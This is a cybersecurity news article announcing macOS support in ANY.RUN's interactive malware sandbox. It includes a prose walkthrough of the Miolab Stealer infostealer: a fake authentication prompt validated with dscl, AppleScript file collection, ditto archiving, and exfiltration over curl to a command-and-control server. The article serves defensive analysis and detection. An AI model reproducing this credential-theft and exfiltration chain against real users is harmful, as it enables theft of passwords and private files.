ANY.RUN has taken a significant step forward by expanding its interactive sandbox platform to support macOS virtual machines. Currently available in beta for Enterprise Suite users, this new capability allows security teams to analyze Apple-focused threats within a unified environment already used for Windows, Linux, and Android investigations.
As modern enterprises increasingly rely on multiple operating systems, security operations centers (SOCs) must adapt quickly. Today, organizations no longer function within a single OS ecosystem. Instead, teams must detect and respond to threats across diverse platforms—often under intense time pressure.
Notably, engineering, product, and leadership teams heavily depend on macOS devices. Because these users often access sensitive business data, internal systems, and proprietary code repositories, they have become prime targets for cyber threats. However, despite the growing adoption of macOS in corporate environments, many SOC workflows have struggled to keep pace.
Consequently, analysts frequently rely on separate tools to investigate macOS-specific threats. This fragmented approach not only slows down investigations but also creates inefficiencies across the entire response cycle. As a result, organizations experience slower alert triage, extended investigation timelines, increasing alert backlogs, higher Mean Time to Respond (MTTR), and even analyst burnout.
ANY.RUN’s macOS Sandbox Expansion
To address these challenges, ANY.RUN has extended its cross-platform sandbox capabilities to macOS. Now, Enterprise Suite users can analyze suspicious files and URLs across four major operating systems within a single workflow. This unified approach eliminates the need to switch between disconnected tools.
Moreover, analysts can now observe complete macOS execution behavior—including process activity, file system changes, network connections, and API calls—within the same interface they already use for other operating systems.
A standout feature of this expansion is the platform’s interactive analysis capability. Some macOS threats are specifically designed to remain inactive until a user performs certain actions, such as entering a password or approving system prompts. Traditional automated sandboxes often fail to detect such behavior, leaving critical threats unnoticed.
In contrast, ANY.RUN’s interactive environment enables analysts to simulate real user actions during sandbox execution. This approach helps uncover credential harvesting dialogs, staged execution chains, and social engineering tactics that passive analysis might overlook.
For example, the Miolab Stealer demonstrates the practical value of this solution. This macOS-targeting infostealer uses a lightweight ~100 KB C-based payload compatible with both Intel x86-64 and Apple Silicon ARM64 architectures. When analyzed within the ANY.RUN sandbox, its entire attack chain becomes visible.
On execution, Miolab displays a fake macOS authentication prompt and validates credentials using the dscl -authonly command. The malware halts its operation unless it successfully captures user credentials.
Once authenticated, it leverages system_profiler to gather system and hardware data. Then, it executes an AppleScript routine using osascript to scan directories such as Desktop, Documents, and Downloads for files like PDF, TXT, and RTF. These files are collected, renamed sequentially, and limited to approximately 10 MB.
Next, the malware compresses the data into a ZIP archive using the ditto utility and exfiltrates it to a command-and-control server via an HTTP POST request executed with curl. Finally, it displays a fake error message to disguise its malicious activity as a system failure.
Key behavioral indicators identified within the sandbox include osascript-based deceptive prompts, AppleScript-driven file collection, ditto archive creation, and outbound data transfers using curl.
Ultimately, integrating macOS into ANY.RUN’s sandbox significantly improves SOC performance. It enables faster alert validation, shorter investigation cycles, broader detection coverage, higher analyst productivity, and reduced alert backlogs—especially during phishing campaigns or malware outbreaks.
By eliminating the need for separate macOS testing environments, security teams can focus more on responding to real threats rather than managing tools. This advancement directly reduces business risk, particularly for organizations where Apple devices play a critical operational role.
Recommended Cyber Technology News:
- Grafana Vulnerabilities Enable Remote Code Execution
- Pentera Appoints Hagit Ynon as CFO to Drive Global Expansion
- RapidScale Drives AI-Powered Growth for Barrett Financial Group
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
